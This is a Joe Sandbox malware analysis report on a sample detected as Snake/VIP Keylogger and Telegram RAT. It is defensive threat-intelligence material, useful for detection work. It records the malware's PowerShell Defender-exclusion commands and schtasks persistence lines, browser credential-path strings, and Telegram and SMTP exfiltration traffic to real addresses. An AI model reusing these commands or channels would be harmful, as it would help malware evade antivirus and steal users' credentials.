Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Analysis ID:1550765
MD5:57fcb286b01acc3318e455c23d5f857f
SHA1:a01a9de8ed1dbd2dad4285748ed1eb2a4765f8d0
SHA256:9e29fdeaf847390ef0ac52a24dca3803eb3b7527e3ecb8c2c18bc337c7425a5e
Tags:exe
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe" MD5: 57FCB286B01ACC3318E455C23D5F857F)
    • powershell.exe (PID: 4504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7380 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 5432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5312 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe (PID: 7176 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe" MD5: 57FCB286B01ACC3318E455C23D5F857F)
      • WerFault.exe (PID: 7704 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7176 -s 1520 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • zDAKFK.exe (PID: 7248 cmdline: C:\Users\user\AppData\Roaming\zDAKFK.exe MD5: 57FCB286B01ACC3318E455C23D5F857F)
    • schtasks.exe (PID: 7504 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • zDAKFK.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Roaming\zDAKFK.exe" MD5: 57FCB286B01ACC3318E455C23D5F857F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d5a6:$a1: get_encryptedPassword
          • 0x2d8c3:$a2: get_encryptedUsername
          • 0x2d3b6:$a3: get_timePasswordChanged
          • 0x2d4bf:$a4: get_passwordField
          • 0x2d5bc:$a5: set_encryptedPassword
          • 0x2ec16:$a7: get_logins
          • 0x2eb79:$a10: KeyLoggerEventArgs
          • 0x2e7de:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 28 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2b9a6:$a1: get_encryptedPassword
                • 0x2bcc3:$a2: get_encryptedUsername
                • 0x2b7b6:$a3: get_timePasswordChanged
                • 0x2b8bf:$a4: get_passwordField
                • 0x2b9bc:$a5: set_encryptedPassword
                • 0x2d016:$a7: get_logins
                • 0x2cf79:$a10: KeyLoggerEventArgs
                • 0x2cbde:$a11: KeyLoggerEventArgsEventHandler
                0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x39714:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38db7:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x39014:$a4: \Orbitum\User Data\Default\Login Data
                • 0x399f3:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 54 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ParentProcessId: 6992, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ProcessId: 4504, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ParentProcessId: 6992, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ProcessId: 4504, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\zDAKFK.exe, ParentImage: C:\Users\user\AppData\Roaming\zDAKFK.exe, ParentProcessId: 7248, ParentProcessName: zDAKFK.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp", ProcessId: 7504, ProcessName: schtasks.exe
                Sigma detected: Suspicious Outbound SMTP Connections
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 205.147.111.116, DestinationIsIpv6: false, DestinationPort: 2525, EventID: 3, Image: C:\Users\user\AppData\Roaming\zDAKFK.exe, Initiated: true, ProcessId: 7556, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49783
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ParentProcessId: 6992, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp", ProcessId: 5312, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ParentProcessId: 6992, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ProcessId: 4504, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ParentProcessId: 6992, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp", ProcessId: 5312, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-07T06:20:22.142526+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449752TCP
                2024-11-07T06:20:59.576883+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449784TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-07T06:20:27.333981+010028033053Unknown Traffic192.168.2.449764188.114.97.3443TCP
                2024-11-07T06:20:30.034678+010028033053Unknown Traffic192.168.2.449773188.114.97.3443TCP
                2024-11-07T06:20:31.528000+010028033053Unknown Traffic192.168.2.449778188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-07T06:20:06.716853+010028032742Potentially Bad Traffic192.168.2.449774193.122.130.080TCP
                2024-11-07T06:20:06.716853+010028032742Potentially Bad Traffic192.168.2.449765193.122.130.080TCP
                2024-11-07T06:20:06.716853+010028032742Potentially Bad Traffic192.168.2.449775193.122.130.080TCP
                2024-11-07T06:20:21.398753+010028032742Potentially Bad Traffic192.168.2.449736193.122.130.080TCP
                2024-11-07T06:20:23.206957+010028032742Potentially Bad Traffic192.168.2.449736193.122.130.080TCP
                2024-11-07T06:20:26.617516+010028032742Potentially Bad Traffic192.168.2.449736193.122.130.080TCP
                2024-11-07T06:20:29.305022+010028032742Potentially Bad Traffic192.168.2.449769193.122.130.080TCP
                2024-11-07T06:20:30.820638+010028032742Potentially Bad Traffic192.168.2.449776193.122.130.080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeReversingLabs: Detection: 21%
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeVirustotal: Detection: 22%Perma Link
                Multi AV Scanner detection for submitted file
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeReversingLabs: Detection: 21%
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeVirustotal: Detection: 22%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49755 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49764 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49773 version: TLS 1.0
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: \??\C:\Windows\mscorlib.pdb T source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.ni.pdbRSDS source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: n.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdbXT source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\PHCUmkeAjDPT.pdb#x source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.pdbd source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: \??\C:\Windows\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.PDB source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: PHCUmkeAjDPT.pdbeAjDPT.pdbpdbDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Xml.pdbd source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.Configuration.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: \??\C:\Windows\exe\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.Core.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: n8C:\Windows\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, zDAKFK.exe.0.dr
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: PHCUmkeAjDPT.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, zDAKFK.exe.0.dr
                Source: Binary string: System.pdbH source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: mscorlib.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: symbols\exe\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: C:\Windows\PHCUmkeAjDPT.pdbpdbDPT.pdb li source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: PHCUmkeAjDPT.pdb089 source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: \??\C:\Windows\symbols\exe\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: nC:\Users\user\Desktop\PHCUmkeAjDPT.pdbp source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Core.ni.pdbRSDS source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: \??\C:\Windows\PHCUmkeAjDPT.pdb8B source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 4x nop then jmp 0F0314ACh0_2_0F030E5F
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 4x nop then jmp 00D9F2D5h16_2_00D9F138
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 4x nop then jmp 00D9F2D5h16_2_00D9F324

                Networking

                barindex
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.4:49783 -> 205.147.111.116:2525
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49776 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49769 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49774 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49765 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49775 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49773 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49764 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49778 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49784
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49752
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
